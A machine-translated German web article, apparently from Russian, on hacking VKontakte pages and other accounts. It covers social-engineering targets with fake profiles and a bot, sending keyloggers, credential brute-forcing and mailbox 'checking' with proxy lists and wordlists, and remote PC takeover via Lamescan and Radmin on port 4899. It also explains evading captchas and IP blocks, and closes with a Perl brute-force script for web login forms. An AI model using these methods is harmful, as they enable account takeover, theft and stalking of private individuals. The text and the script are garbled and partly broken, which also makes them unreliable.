Programme für rohe VK-Seiten. Brute-Force-Passwortwiederherstellung. Computer-Hacking aus der Ferne

💖 Gefällt es dir? Teilen Sie den Link mit Ihren Freunden

Ja, es existiert. Im Allgemeinen gibt es viele solcher Programme.

Und wir sind gegen solche Programme.

Da aber eine gewisse Nachfrage nach solchen Programmen besteht, schauen wir uns an, welche davon „relativ“ legal sind und welche man besser gar nicht nutzen sollte.
Schon bei der Gründung von VKontakte gab es beispielsweise Programme wie Brute-Force-Anwendungen.
Solche Programme sind damit beschäftigt, alle vorhandenen Passwörter zu durchsuchen. Dabei kommen sowohl herkömmliche Schritt-für-Schritt-Algorithmen als auch sogenannte Algorithmen zum Einsatz. Regenbogentabellen, in denen Werte zufällig entsprechend der besten Verteilung gestreut sind – wie von den Autoren beabsichtigt neueste Programme Durch die Zufallsverteilung kann die Suche nach einem Passwort verkürzt werden, da die Suche nicht von vorne beginnt, sondern zufällig erfolgt und der Weg zum gewünschten Buchstaben im Durchschnitt kürzer ist.
Wir empfehlen überhaupt nicht, Brute-Force-Programme zu verwenden. Es gibt eine Vielzahl von Programmen zum Hacken von VKontakte, daher ist es besser, nicht grob in eine Seite einzudringen; außerdem könnte der Benutzer selbst etwas vermuten und die Seite löschen, eine andere erstellen oder ihre Adresse ändern. Und ausserdem, Die VK-Administration wird Sie per IP sperren und möglicherweise ein Gerichtsverfahren wegen Angriffs auf Anmeldeserver und Verletzung ihrer Stabilität sowie des Versuchs, in die Korrespondenz einer anderen Person einzudringen, einleiten.

Daher sind Programme zum Hacken von VKontakte mit roher Gewalt illegal. Was gibt es sonst noch?

Im Allgemeinen haben Sie immer Zeit, das VKontakte-Hacking-Programm kostenlos herunterzuladen. Davon gibt es wirklich viele. Schauen wir uns an, welche legalen Möglichkeiten es gibt, in die Seite einer anderen Person einzudringen.
Das sind zunächst einmal Bewerbungen. Anwendungen verfügen über eine Fülle von Informationen über den Benutzer. Normalerweise lesen Benutzer die angezeigten Eingabeaufforderungen nicht, bevor sie die Anwendung starten. Und dort erhält die Anwendung vollen Zugriff auf persönliche Daten, die Freundesliste, die Pinnwand usw. Persönliche Nachrichten bleiben der Anwendung natürlich unbekannt, aber Wenn Sie die enorme Menge an persönlichen Informationen kennen, die zuvor hinter den Datenschutzeinstellungen verborgen waren, können Sie Betrügereien im Bereich Social Engineering durchführen und Informationen über den Benutzer von seinen engsten Freunden „ablocken“.
Dies ist jedoch nicht ganz legal – es kann zu Problemen kommen, wenn der Benutzer vermutet, dass es die Anwendung war, die die Daten „durchgesickert“ hat, dann wird er natürlich eine Beschwerde dagegen einreichen und die Anwendung wird gesperrt. Generell ist die Methode gut, gerät aber schnell unter Verdacht. ja und Einen Antrag zu stellen ist immer noch mühsam.
Fortfahren.

Wo kann ich normalerweise ein Programm zum Hacken von VKontakte-Seiten herunterladen, das legal ist?

Lassen Sie uns zunächst klarstellen: Wir geben uns nur mit Social Engineering zufrieden. Grundsätzlich hilft uns Social Engineering bei richtiger Anwendung dabei, alle benötigten Daten von einem Benutzer zu extrahieren, ohne seine Seite zu hacken. Sie können jedoch auch vollen Zugriff auf die Seite erhalten.
Welche sozialen Programme gibt es zum Hacken von VKontakte, die Sie kostenlos herunterladen können?
Zunächst ist der Brobot-Bot erwähnenswert.
Es zum Hacken zu verwenden, ist natürlich eine ziemlich seltsame Methode, dieses Programm zu kontrollieren, aber im Prinzip ist Die dortige Funktionalität ist zum Hacken notwendig und ausreichend.
Wir können den Bot gegen den Benutzer selbst und seine Freunde „ausspielen“, indem wir die Möglichkeiten zum Hinzufügen von Freunden und zur persönlichen Korrespondenz nutzen. Lassen Sie uns Bot III für Gespräche verbinden und ihn auf den freundlichsten Ton einstellen. Und danach können Sie bereits von den Vorteilen profitieren, indem Sie in der von Brobot gespeicherten Korrespondenzhistorie viele interessante Dinge über den Benutzer erfahren.
Anschließend können Sie dem Benutzer beispielsweise Folgendes senden: Keylogger und fangen Sie ab, was er anderen Benutzern schreibt– Tatsächlich müssen Sie danach keine speziellen Programme zum Hacken von VKontakte mehr herunterladen. Es reicht aus, nur den Benutzer zu überwachen. Allerdings geht es auch ohne Keylogger!

Wie können uns VKontakte-Hacking-Programme wie Brobot helfen?

Definieren wir zunächst was Brobot hackt keine Seiten. Alle unsere Aktivitäten sind absolut legal, niemand kann uns verklagen, niemand kann uns blockieren – alles ist absolut fair (soweit wir es brauchen).
Tatsächlich erstellen wir einfach mehrere Seiten (es ist besser, sofort unbegrenzt zu kaufen, dies erhöht garantiert die Menge der extrahierten Informationen), und von dort aus kommunizieren wir bereits mit dem Benutzer, was ermöglicht es uns, seine Einstellung zu einer Vielzahl von Persönlichkeiten herauszufinden und ein Porträt von sich selbst, seinen Freunden, seinen Verwandten usw. zu erhalten – und das ist im Wesentlichen das, was wir brauchen. Und in Zukunft können Sie noch interessantere und komplexere Aktionen ausführen, und hier hängt alles von Ihren Wünschen und Ihrer Vorstellungskraft ab.
Das Brobot-Programm gehört Ihnen ein guter Helfer, und das Support-Team von Brobot, das fast rund um die Uhr erreichbar ist, beantwortet alle Ihre technischen Fragen.

Brute Force (abgeleitet von der englischen Phrase: Brute Force) ist eine Art Hackerangriff – eine Möglichkeit, Konten zu hacken Computersysteme, Zahlungs-/Bankdienstleistungen und auf Websites durch automatisierte Auswahl von Passwort- und Login-Kombinationen.

Brute Force basiert auf der gleichnamigen mathematischen Methode (Brute Force), bei der richtige Lösung– Eine endliche Zahl oder symbolische Kombination wird durch Aufzählung gefunden Verschiedene Optionen. Tatsächlich wird jeder Wert aus einem bestimmten Satz möglicher Antworten (Lösungen) auf seine Richtigkeit überprüft.

Wie rohe Gewalt funktioniert

Ein Hacker schreibt ein spezielles Programm zum Erraten von Passwörtern oder nutzt eine vorgefertigte Lösung seiner Kollegen. Es kann auf einen bestimmten E-Mail-Dienst, eine Website oder ein soziales Netzwerk abzielen (d. h. es ist zum Hacken einer bestimmten Ressource gedacht). Als nächstes werden Vorbereitungen für das Hacken getroffen. Es besteht aus folgenden Schritten:

  1. Erstellung einer Proxy-Liste

Um die wahre IP-Adresse des Computers zu verbergen, von dem aus der Angriff ausgeführt wird, und um eine Blockierung der Website zu verhindern, auf der gehackt werden muss Konto, richten Sie eine Internetverbindung über einen Proxyserver ein.

Die Suche nach Proxy-Adressen/Ports erfolgt im Proxy Grabber. Dieses Dienstprogramm ruft unabhängig alle Daten für die Verbindung zu Zwischenservern von Websites ab, die Proxys bereitstellen (diese sind in der Liste angegeben). Mit anderen Worten: Es wird ein Proxy gesammelt.

Die resultierende Datenbank wird in einer separaten Textdatei gespeichert. Anschließend werden alle darin enthaltenen Serveradressen im Proxy-Checker auf Funktionsfähigkeit überprüft. Sehr oft kombinieren Programme, die für automatisiertes Proxy-Mining entwickelt wurden, die Funktionen eines Grabbers und eines Checkers.

Als Ergebnis erhalten Sie eine vorgefertigte Proxy-Liste in Form einer IP-/Port-Liste, gespeichert in txt-Datei. (Sie benötigen es beim Einrichten des Brute-Force-Programms).

  1. Suche nach Basen für Brute

Sie müssen ein Wörterbuch mit Brute Force verbinden – einem bestimmten Satz von Kombinationen aus Passwörtern und Logins – die es im Login-Formular ersetzt. Sie hat wie die Proxy-Liste die Form einer regulären Liste Textdatei(.txt). Wörterbücher, auch Datenbanken genannt, werden über Hacker-Foren, Websites und Datei-Hosting-Dienste verbreitet. Erfahrenere „Handwerker“ stellen sie selbst her und stellen sie gegen eine Gebühr allen zur Verfügung. Je größer die Basis (Anzahl der Kombinationen, Logins, Konten), desto besser (für den Hacker) – desto größer die Wahrscheinlichkeit eines Hackererfolgs.

  1. Brute-Force-Einrichtung

Die Proxy-Liste wird geladen; Das Auswahlprogramm ändert den Proxy automatisch, sodass der Webserver den Angriff und dementsprechend die Quelle (Host) des Angriffs nicht erkennt.

Ein Wörterbuch mit Passwort-/Login-Kombinationen ist angeschlossen. Die Anzahl der Threads wird festgelegt – wie viele Kombinationen Brute-Force gleichzeitig prüft. Leistungsstarker Computer Mit hohe Geschwindigkeit Die Internetverbindung bewältigt souverän 120-200 Streams (das ist der optimale Wert). Die Geschwindigkeit des Brutes hängt direkt von dieser Einstellung ab. Wenn Sie beispielsweise nur 10 Threads festlegen, erfolgt die Auswahl sehr langsam.

  1. Brutale Gewalt ausführen

Das Programm zeichnet erfolgreiche Hackversuche auf: Es speichert die verknüpften Konten (Passwort/Login) in einer Datei. Die Dauer des Auswahlverfahrens beträgt mehrere Stunden bis mehrere Tage. Allerdings ist es aufgrund der hohen kryptografischen Stärke der Anmeldedaten oder der Implementierung anderer Schutzmaßnahmen durch den Angreifer nicht immer effektiv.

Arten von roher Gewalt

Persönliches Hacken

Auf der Suche nach einem bestimmten Konto – in einem sozialen Netzwerk, bei einem E-Mail-Dienst usw. Durch oder im Prozess der virtuellen Kommunikation entlockt der Angreifer dem Opfer ein Login, um auf eine Website zuzugreifen. Dann knackt er das Passwort mit Brute-Force-Methoden: Er gibt mit Brute-Force die Adresse der Webressource und den erhaltenen Login an und verbindet das Wörterbuch.

Die Wahrscheinlichkeit eines solchen Hacks ist beispielsweise im Vergleich zum gleichen XSS-Angriff gering. Dies kann erfolgreich sein, wenn der Kontoinhaber ein Passwort mit 6–7 Zeichen und einer einfachen Symbolkombination verwendet. Andernfalls wird das „Lösen“ stabilerer Varianten von 12, 15, 20 Buchstaben, Zahlen und Sonderzeichen Jahre dauern – Dutzende und Hunderte von Jahren, basierend auf den Berechnungen der mathematischen Suchformel.

Brut/Check

Eine Datenbank mit Logins/Passwörtern aus Postfächern eines Mail-Dienstes (z. B. mail.ru) oder anderer ist mit Brute Force verbunden. Und eine Proxy-Liste – um den Knoten zu maskieren (da für mehrere Anfragen von einer IP-Adresse Webdienste Email der Angriff wird recht schnell erkannt).

Die Optionen des Brutes zeigen eine Liste von Schlüsselwörtern (normalerweise Site-Namen) an – Orientierungspunkte, anhand derer er nach Anmeldeinformationen in gehackten Postfächern sucht (zum Beispiel: Steampowered, Worldoftanks, 4Game, VK). Oder eine bestimmte Internetressource.

Bei der Registrierung in einem Online-Spiel, sozialen Netzwerk oder Forum gibt ein Benutzer erwartungsgemäß seine E-Mail-Adresse an ( Briefkasten). Der Webdienst sendet eine Nachricht mit Anmeldeinformationen und einem Link zur Bestätigung der Registrierung an die angegebene Adresse. Es sind diese Briefe, nach denen Brute Force sucht, um daraus Logins und Passwörter zu extrahieren.

Klicken Sie auf „START“ und das Cracking-Programm beginnt mit roher Gewalt. Es funktioniert nach folgendem Algorithmus:

  1. Lädt den Benutzernamen/das Passwort für die E-Mail aus der Datenbank.
  2. Überprüft den Zugriff oder „überprüft“ (automatische Anmeldung): Wenn es möglich ist, sich in das Konto einzuloggen, fügt es eine in der Spalte „Gut“ hinzu (das bedeutet, dass eine weitere geschäftliche E-Mail gefunden wurde) und beginnt mit der Anzeige (siehe die folgenden Punkte). ); Wenn kein Zugriff besteht, wird es als fehlerhaft aufgeführt.
  3. Bei allen „Beeps“ (offenen E-Mails) scannt Brute Force Briefe entsprechend der vom Hacker angegebenen Anfrage – das heißt, es sucht nach Logins/Passwörtern für die angegebenen Websites und Zahlungssysteme.
  4. Wenn die benötigten Daten gefunden werden, kopiert es diese und schreibt sie in eine separate Datei.

Dadurch kommt es zu einem massiven „Hijacking“ von Konten – von Dutzenden bis hin zu Hunderten. Der Angreifer verfügt über die erhaltenen „Trophäen“ nach eigenem Ermessen – Verkauf, Tausch, Datenerfassung, Gelddiebstahl.

Computer-Hacking aus der Ferne

Zur Erlangung wird brutale Gewalt in Verbindung mit anderen Hacking-Tools eingesetzt Fernzugriffüber einen Internetkanal an den passwortgeschützten PC des Opfers gesendet.

Diese Art von Angriff besteht aus den folgenden Phasen:

  1. Es wird nach IP-Netzwerken gesucht, in denen der Angriff auf Benutzercomputer durchgeführt wird. Adressbereiche werden aus speziellen Datenbanken oder durch übernommen spezielle Programme, wie z. B. IP Geo. Darin können Sie IP-Netzwerke für einen bestimmten Bezirk, eine Region und sogar eine Stadt auswählen.
  2. Ausgewählte IP-Bereiche und Auswahlwörterbücher werden in den Einstellungen des Lamescan-Brute-Force-Programms (oder seines Analogons) festgelegt, das für die Remote-Brute-Force-Anmeldung/Passwort vorgesehen ist. Nach dem Start führt Lamescan Folgendes aus:
  • stellt eine Verbindung zu jeder IP aus einem bestimmten Bereich her;
  • Nach dem Verbindungsaufbau wird versucht, über Port 4899 eine Verbindung zum Host (PC) herzustellen (möglicherweise gibt es jedoch auch andere Optionen);
  • wenn der Port offen ist: versucht, Zugriff auf das System zu erhalten, führt bei der Aufforderung zur Eingabe eines Passworts eine Vermutung durch; Bei Erfolg werden die IP-Adresse des Hosts (Computers) und die Anmeldeinformationen in seiner Datenbank gespeichert.

  1. Der Hacker startet das Dienstprogramm Radmin, das zur Verwaltung von Remote-PCs entwickelt wurde. Legt die Netzwerkkoordinaten des Opfers fest (IP, Login und Passwort) und erlangt die volle Kontrolle über das System – den Desktop (visuell auf dem Display des Computers des Angreifers angezeigt), Dateiverzeichnisse, Einstellungen.

Programme für Brutus

HASHCAT

Für 2020 eines der leistungsstärksten Programme für Brute. Verwendet mehr als 200 Brute-Force-Algorithmen. Wird häufig zum Erraten von WPA/WPA2-Passwörtern sowie Passwörtern für MS Office-, PDF-, 7-Zip-, RAR- und TrueCrypt-Dokumente verwendet.

Klassische Brute-Force, einer der allerersten. Es verliert jedoch nicht an Relevanz und konkurriert mit neuen Lösungen. Es verfügt über einen schnellen Brute-Force-Algorithmus und unterstützt alle wichtigen Internetprotokolle – TCP/IP, POP3, HTTP usw. Es kann Cookies fälschen. Zerstört das Wörterbuch und generiert selbstständig Passwörter.

Leistungsstarker Brute-Checker. Ausgestattet mit einem erweiterten Arsenal an Funktionen für die Arbeit mit Datenbanken (Prüfung, Sortierung nach Domänen). Unterstützt Verschiedene Arten Proxy, prüft deren Funktionsfähigkeit. Scannt Briefe in Postfächern anhand von Einstellungen wie Datum, Stichwort, Adresse, ungelesene Nachrichten. Kann Briefe von Mail.ru und Yandex herunterladen.

Brute Force – Brute Force, Brute Force Hacking
Im Artikel „“ hieß es, dass es unmöglich sei, VK mit Brute-Force (Programm) zu hacken.
Das stimmt nicht ganz, es gibt immer noch Lücken...
Unten ist ein funktionierendes Skript, aber zuerst ...

Am Ende des Artikels finden Sie ein kostenloses Programm zum Erstellen eines Brute-Wörterbuchs und eine Liste der „Top-Sauger-Passwörter“.

Ich mache im Voraus einen Vorbehalt, dass es sich um eine klassische „Brute Force“ ohne PBKDF2-Algorithmen handelt, ohne das Sha-Hashing zu analysieren, weil Auf alltäglicher Ebene ist dies eine überwältigende Aufgabe.

Im Internet kursieren viele Programme „zum Hacken von VK mit Brute-Force (Brute Force)“

Welches soll ich wählen? Welches hilft (ohne mir zu schaden)?
- Keiner

Jedes VK-Konto erfordert eine persönliche Herangehensweise und Vorlagenprogramme aus dem Netzwerk sind allesamt Mist, Betrug, Schwachsinn.

Jetzt werden Sie verstehen, warum. Mathematischer Teil kurz.

Die Mindestlänge eines VK-Passworts beträgt 6 Zeichen.

Das Passwort muss enthalten:
Zahlen(0-9 - 10 Optionen),
Briefe(a-z - 26 in Latein),
Großbuchstaben(A-Z - auch 26)

Insgesamt für jedes Symbol - 10+26+26=62 (!) Optionen, also die Anzahl der Kombinationen für:
6-stelliges Passwort – 56.800.235.584 (56,8 Milliarden)
7-stelliges Passwort – 3.521.614.606.208 (3,5 Billionen)
8-stelliges Passwort – 218.340.105.584.896 (218 Billionen)
9-stelliges Passwort -13 537 086 546 263 600 (HZ wie es genannt wird))))

Da wir die Länge des Passworts nicht kennen, müssen wir einen Bereich von mindestens 6–8 Zeichen brutal erzwingen
Gesamt: 6+7+8 Zeichen = 221.918.520.426.688 (222 Billionen) Optionen

Nehmen wir an, Sie haben einen ziemlich guten Computer, aber es stellt sich die Frage: Wie viele Anfragen an den VK-Server kann er stellen?
Wie hoch ist die Suchgeschwindigkeit eines Heimcomputers?

Lass uns rechnen. Dafür werden wir öffnen Befehlszeile(Start – Standard – Eingabeaufforderung oder starten Sie den Prozess cmd.exe)
Geben Sie den Befehl ein und erhalten Sie die Serverantwort

„Antwort von .....Zeit 134 ms“ (das ist für mich, Ihre Zeit kann abweichen)

Die Ping-Zeit ist die Zeit, die das Signal benötigt, um von unserem Computer zum Server und zurück zu gelangen

Eine Sekunde hat also 1000 Millisekunden (ms).
Die Brute-Geschwindigkeit Ihres Computers (Anfragen/Sek.) beträgt = 1000/Antwortzeit
In meinem Fall sind 1000/134 ms = 7,4 Anfragen (Passwörter) pro Sekunde

Wie lange dauert die Suche nach Passwörtern für VK?

Ich möchte Sie daran erinnern, dass wir 221.918.520.426.688 (222 Billionen) Passwortoptionen ausprobieren.

Um herauszufinden, wie viel wir das VK-Passwort mit roher Gewalt knacken werden, teilen wir den Betrag durch die Geschwindigkeit, d. h.

221918520426688 Passwörter / 7,4 Passwörter pro Sekunde = 29737081737176 Sekunden = 495618028953 Minuten = 8260300483 Stunden = 344179187 Tage = 942957 Jahre

Abschluss:Ein echtes Programm zum Hacken von VK könnte in 94.000 Jahren mit roher Gewalt ein Passwort finden.

Frage: Was ist mit den Videos auf YouTube, in denen Wunderprogramme eine VK-Seite in wenigen Minuten/Stunden brutal erzwingen?
Ich antworte: Dies ist ein Betrug, der mit dem Ziel erstellt wurde, Ihren Computer zu infizieren, um Ihre eigenen Daten zu stehlen. Nicht mehr und nicht weniger.

Sie können den Suchvorgang erheblich beschleunigen!
Dazu benötigen Sie:
1. Erhöhen Sie die Rechenleistung. Zum Beispiel 1.000.000 Computer anderer Leute infizieren und gleichzeitig VK von allen mit Brute-Force-Angriff entfernen (das ist lustig)
2. Verkürzen Sie das Brute-Wörterbuch auf beispielsweise ein paar Tausend (basierend auf dem Prinzip des Social Engineering).

Wie erstelle ich ein Brute-Wörterbuch?
1. Verwendung von Stiften im Notepad-Programm (notepad.exe)
2. Prog „Brutus Generator“ (Link am Ende des Artikels)

Wir füllen dieses Brute-Wörterbuch mit echten Optionen.

Echte sind solche, die zumindest irgendwie mit der gehackten Person verbunden sind:

-Telefone(er, seine Verwandten, Freunde)
Beispiel- Zahlen mit +7, 8, ohne 8 - selten zu sehen

- Geburtsdaten(er, seine Verwandten, geliebten Menschen)
Beispiel- (gleiches Datum) 010118, 01012018, 20180101, 180101 - kommt oft vor

- Namen geliebter Menschen
Beispiel- SashaMaria, MariaIvanova, SaNoMaIv - wirkt durchschnittlich

Site-Name (oder Nachname) in einem anderen Layout
Beispiel, wenn Sie das Wort „vkontakte“ auf der russischen Tastatur eingeben, erhalten Sie „mlshtefleu“ – ein solches Schema kommt sehr oft auf allen Websites vor.

- Lokhovs Liste der Passwörter für Brutus(Liste der gängigsten Passwörter im Internet – Link am Ende des Artikels)

Wie lange dauert es, ein Wörterbuch zu schreiben? Na ja, nicht wirklich – eine halbe Stunde reicht. Wer hat gesagt, dass es einfach sein würde?))

Nehmen wir an, wir haben ein Brute-Wörterbuch und ein Arbeitsprogramm zum Auswählen eines VK-Passworts (oder zur manuellen Eingabe über ein Wörterbuch) erstellt.

Es entsteht ein wichtiges Problem – das Serversicherheitssystem.

Tatsächlich liegt das Hindernis darin, dass der Server bei zu häufigen Anfragen dummerweise Ihre IP (vorübergehend) blockiert. Wenn Sie außerdem mit VK über ein Standardeingabeformular (HTML\FORM) arbeiten, dann nach 3 erfolgloser Versuch VK wird Sie bitten, ein Captcha einzugeben.

IN alte Version VK könnte einfach auf die mobile Version umsteigen – m.vk.com, aber jetzt mobile Version So etwas gibt es nicht – 2016 haben sie ein einziges adaptives Design entwickelt.

Wie umgehe ich das VKontakte-Captcha?

VK erfordert die Eingabe eines Captchas nach drei erfolglosen Versuchen (ein Neustart von F5 hilft nicht), aber woher weiß es das? du bist es Versuchen Sie mehrmals, sich anzumelden?

Per IP
- durch Cookies, Cache und JavaScript

Mit Cookies, Cache und JavaScript gibt es keine Probleme – Sie können diese einfach in Ihren Browsereinstellungen deaktivieren.

Die IP kann durch die Installation eines Programms zum Ändern der IP geändert werden – das ist nichts Kompliziertes, es gibt viele davon im Internet (Google kann helfen)

Sie können den TOR-Browser verwenden (für diejenigen, die es nicht wissen, dies ist ein Browser für anonymes Surfen im Netzwerk, er ändert auch die IP-Adressen bei jeder neuen Sitzung). nützliches Ding insbesondere für diejenigen, die in der Sonderverwaltungszone surfen oder arbeiten)

Aber alle Versuche roher Gewalt werden durch GEOLOCATION fast vollständig zunichte gemacht.

Der VK-Server merkt sich, wo (geografisch) die letzte Anmeldung erfolgt ist.

Und wenn Ihre IP von einem anderen Ort stammt, wird (möglicherweise) die folgende Meldung angezeigt:

„Sie versuchen, sich von einem ungewöhnlichen Ort aus unter dem Namen Ivan Ivanov einzuloggen.“

Um zu bestätigen, dass Sie wirklich der Eigentümer der Seite sind, geben Sie bitte alle fehlenden Ziffern der Telefonnummer an, mit der die Seite verlinkt ist.

Skript für Brute-Webformulare (z. B. ein Programm zum Hacken von VK)

Wichtig! Auf dem VK-Server gibt es ein Skript, das die Häufigkeit des Paketversands überwacht, d.h. Wenn Sie mit einer Geschwindigkeit von N Mal/Sekunde hämmern, werden Sie automatisch zur IP-Sperrliste weitergeleitet.
VK nutzt auch GEO-Tracking.

Ohne eine dynamische IP sollten Sie nicht versuchen, zu bruten, ein VPN kann helfen.
Persönlich halte ich das Brute-Force-Force von VK-Passwörtern für wenig vielversprechend, aber für Kenner werde ich ein altes Perl-Skript veröffentlichen, das von 5p4x2knet a.k.a. entlehnt wurde. Apokalyptisch und ein wenig behoben.

Das Skript funktioniert mit der POST-Methode nur in zwei Parametern: Anmeldung Und Passwort.

Wenn der Login bekannt ist (z. B. eine Telefonnummer), füllen Sie einfach die entsprechenden Felder mit dem Wert aus, ohne auf das Wörterbuch zurückzugreifen.

Versteckte Felder – Captcha, das Skript überträgt keine Bilder, verbirgt die Quelle der Anfragen (Sie selbst), wie oben beschrieben.

Hier benötigen wir das vernünftige Brute-Wörterbuch, das wir am Anfang des Artikels zusammengestellt haben. (nennen wir es zum Beispiel brutal.txt )

Wir benötigen außerdem eine Datei, aus der unser Programm Informationen erhält.

Das Programm wird alle in dieser Datei angegebenen Skripte brutal erzwingen.( info.txt). Wenn nur ein Skript vorhanden ist, können Sie es ersetzen

Selbstverständlich ist die Datei zur Aufzeichnung der Ergebnisse ( result.txt)

Also,
{
#verbinde das Objekt
$usagent = LWP::UserAgent
#Öffnen Sie die Datei mit Informationen (wenn wir sie nicht öffnen können, beenden Sie den Vorgang);
# Speichern Sie die Datei im @infa-Array und schließen Sie sie. (Wenn es nur ein Skript gibt, können Sie es sofort angeben)
open(INFA, ";
schließen(INFA);

#öffne das Brute-Wörterbuch
open(BRUT, ";
close(BRUT);

#Öffnen einer Datei mit Ergebnissen (wird am Ende angehängt).
open(RESULT, ">>$ARGV");
#Beginn des Zyklus
foreach $name (@infa)
{
#separate URL, Login, Variablen und Fehlerinformationen
($url, $login, $log_vr, $pwd_vr, $failed) = split(//, $name);
#URL anzeigen
print "$url...n";
#einen neuen Zyklus starten
foreach $brut (@brut)
{
#kill Leerzeichen und Zeilenumbrüche
$pss =~ s/ //;
$pss =~ s/n//;

#verbinde ein neues Objekt
$usagent = LWP::UserAgent->new();
#Anfragen erstellen.
$req = HTTP::Request->new(POST=>$url);
$req->content_type("application/x-www-form-urlencoded");
$req->content("$log_vr=$login&$pwd_vr=$pss");

#und sein Senden
$result = $usagent -> request($req);
#Speichern der Ergebnisse in einer Variablen
$res = $result->content;
#Wenn es nicht funktioniert, wird eine Fehlermeldung generiert
if($res!~ /$failed/i)
{
#Nachricht mit Passwort ausgeben; in Ergebnissen aufzeichnen;
print „brutword gefunden. Es ist nicht $pssnn“;
print RESULT „URL: $urlnLOGIN: $loginnBRUT: $pssnn“;

#sonst Fortsetzung der Auswahl
zuletzt;
}
}
}
#Schließen der result.txt-Datei
close(RESULT);



Freunden erzählen